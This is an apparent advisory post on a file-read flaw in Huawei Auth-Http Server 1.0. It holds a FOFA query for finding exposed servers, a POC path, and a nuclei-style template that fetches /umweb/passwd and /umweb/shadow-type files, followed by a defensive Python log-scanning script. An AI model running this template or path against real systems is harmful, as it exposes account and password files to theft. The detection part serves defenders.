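Vulnerability description:
Huawei Auth-Http arbitrary file disclosure vulnerability. An attacker can craft malicious requests to obtain system information, and the flaw carries other security risks as well.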
FOFA:
server="Huawei Auth-Http Server 1.0"
POC (sourced from the Internet):
/umweb/shadow

id: huanwei-auth-http-server-fileread

info:
  name: 华为Auth-Http Server 1.0任意文件读取
  author:
  severity: medium
  description: 华为Auth-Http Server 1.0任意文件读取,攻击者可通过此漏洞获取敏感信息。
  reference:
    - https://
  metadata:
    fofa-query: server="Huawei Auth-Http Server 1.0"
    verified: true
    max-request: 1

http:
  - raw:
      - |
        GET /umweb/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 && contains_all(body,"root")'
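For defenders, the two paths above can be hunted for in web logs. The following is an added example, not part of the original post or of the template: it assumes requests to the device pass through a reverse proxy that writes Apache/nginx "combined" format logs, the function names are hypothetical, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Paths named on this page: the POC path and the template's request path.
SENSITIVE_PATHS = {"/umweb/passwd", "/umweb/shadow"}

# Assumption: "combined" log format written by a proxy in front of the device.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def normalize(target):
    """Drop the query string, percent-decode, collapse slashes, lowercase."""
    path = unquote(target.split("?", 1)[0])
    path = re.sub(r"/+", "/", path)
    return path.rstrip("/").lower()

def find_hits(lines):
    """Return one record per request whose normalized path is a sensitive path."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        path = normalize(m["target"])
        if path in SENSITIVE_PATHS:
            hits.append({
                "ip": m["ip"], "time": m["ts"], "path": path,
                "status": int(m["status"]),
                # 200 with a non-empty body means file content was likely returned
                "served": m["status"] == "200" and m["size"] not in ("-", "0"),
            })
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2024:10:01:22 +0000] "GET /umweb/passwd HTTP/1.1" 200 1184 "-" "curl/8.0"',
    '192.0.2.10 - - [12/Mar/2024:10:01:25 +0000] "GET /umweb/%73hadow HTTP/1.1" 200 932 "-" "curl/8.0"',
    '198.51.100.7 - - [12/Mar/2024:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Mar/2024:11:30:41 +0000] "GET //umweb//passwd?x=1 HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        label = "CONTENT SERVED" if hit["served"] else "probe only"
        print(f'{hit["time"]} {hit["ip"]} {hit["path"]} {hit["status"]} {label}')
```

Records with `served` set to true are the ones to triage first, since they indicate the file was actually returned rather than merely requested.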